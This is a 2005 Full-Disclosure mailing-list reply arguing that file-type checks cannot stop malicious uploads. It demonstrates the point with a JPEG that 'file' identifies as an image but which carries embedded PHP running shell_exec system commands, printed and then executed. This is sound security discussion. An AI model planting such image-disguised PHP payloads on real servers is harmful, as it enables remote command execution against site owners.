Le mardi 25 octobre 2005 à 17:02 -0400, Paul Laudanski a écrit : > > Anyone have other ideas on this? I've already implemented some code > to validate file input and its working. But is this the right > approach?
I'm not sure to understand what you're talking about but if you're trying to positively validate that file XYZ is an image and not a PHP file, you're asking for trouble : $> wget http://nicob.net/mirrors/blowjob.jpg $> file blowjob.jpg blowjob.jpg: JPEG image data, JFIF standard 1.0 $> tail -n 5 blowjob.jpg <?php $resu = shell_exec("echo '' && echo '' && uname -a && id && date"); echo nl2br($resu); ?> $> php blowjob.jpg [garbage] Linux dellyre 2.6.[...] jeu oct 27 15:21:31 CEST 2005 [...] Nicob _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
